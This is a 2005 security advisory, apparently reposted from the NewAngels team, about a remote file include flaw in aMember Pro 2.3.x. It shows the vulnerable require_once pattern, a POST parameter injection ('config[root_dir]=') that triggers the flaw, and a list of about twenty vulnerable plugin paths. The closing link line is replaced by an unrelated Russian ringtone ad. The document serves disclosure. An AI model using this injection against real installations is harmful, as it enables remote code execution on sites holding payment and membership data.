aMember Pro 2.3.X - Remote File Include Vulnerability

Type securityvulns
Reporter Securityvulns
Modified 2005-09-09T00:00:00


aMember Pro 2.3.X - Remote File Include Vulnerability

[NewAngels Advisory

2] aMember Pro

2.3.X - Remote File Include Vulnerability =============================================================================

Software: aMember Pro 2.3.4 Type: Remote PHP File Include Vulnerability Risk: High

Date: Aug. 16 2005 Vendor: CGI Central


NewAngels Team with special note of 4Degrees.


"aMember is a flexible membership and subscription management PHP script. It has support for PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling, Multicards, E-Gold and Clickbank payment systems (complete list can be found here) and allows you to setup paid-membership areas on your site. It can also be used without any payment system - you can manage users manually." []

PHP Requirements:

register_globals = On


Source: >global $config; >[...] >require_once($config['root_dir']."...somestring...");


This vulnerability exists in several files, the code is not exactly the same in all files. But the exploit does remain the same.

Example: POST: config[root_dir]=

Vulnerable Files: /aMember/plugins/db/mysql/ /aMember/plugins/payment/efsnet/ /aMember/plugins/payment/theinternetcommerce/ /aMember/plugins/payment/cdg/ /aMember/plugins/payment/compuworld/ /aMember/plugins/payment/directone/ /aMember/plugins/payment/authorize_aim/ /aMember/plugins/payment/beanstream/ /aMember/plugins/payment/echo/ /aMember/plugins/payment/eprocessingnetwork/ /aMember/plugins/payment/eway/ /aMember/plugins/payment/linkpoint/ /aMember/plugins/payment/logiccommerce/ /aMember/plugins/payment/netbilling/ /aMember/plugins/payment/payflow_pro/ /aMember/plugins/payment/paymentsgateway/ /aMember/plugins/payment/payos/ /aMember/plugins/payment/payready/ /aMember/plugins/payment/plugnplay/

orginal advisory: - мобильные развлечения: мелодии, логотипы, Java-игры